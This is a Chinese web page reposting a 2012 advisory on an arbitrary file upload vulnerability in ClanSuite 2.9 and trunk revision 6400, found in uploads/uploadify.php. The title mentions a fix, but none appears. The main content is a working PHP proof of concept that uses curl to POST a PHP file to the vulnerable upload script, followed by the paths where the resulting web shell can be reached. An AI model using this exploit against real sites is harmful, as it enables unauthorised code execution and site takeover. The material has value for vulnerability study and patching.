当前位置:K88软件开发文章中心电脑基础基础应用01 → 文章内容

ClanSuite 2.9任意文件上传漏洞及修复

减小字体 增大字体 作者:佚名  来源:翔宇亭IT乐园  发布时间:2018-12-31 12:32:22

:2012-06-14 23:48:27

标题: ClanSuite 2.9 Arbitrary File Upload

发现者: Adrien Thierry

程序开发商http://clansuite.com/

下载地址 : https://github.com/jakoch/Clansuite http://svn.gna.org/svn/clansuite/trunk/

影响版本: 2.9 and Trunk Revision 6400

缺陷地址 : uploads/uploadify.php

测试方法

<?php
$u="C:\Program Files (x86)\EasyPHP-5.3.9\www\info.php";
$c = curl_init("http:// www.k88.net /uploads/uploadify.php"); // Version 2.9
$c = curl_init("http:// www.k88.net /application/uploads/uploadify.php"); // Version trunk
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$u",
'name'=>"info.php"));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>

shell位置:

http://www.XXX.com /uploads/temps/info.php

或者 http://www.XXX.com /application/uploads/temps/info.php


ClanSuite 2.9任意文件上传漏洞及修复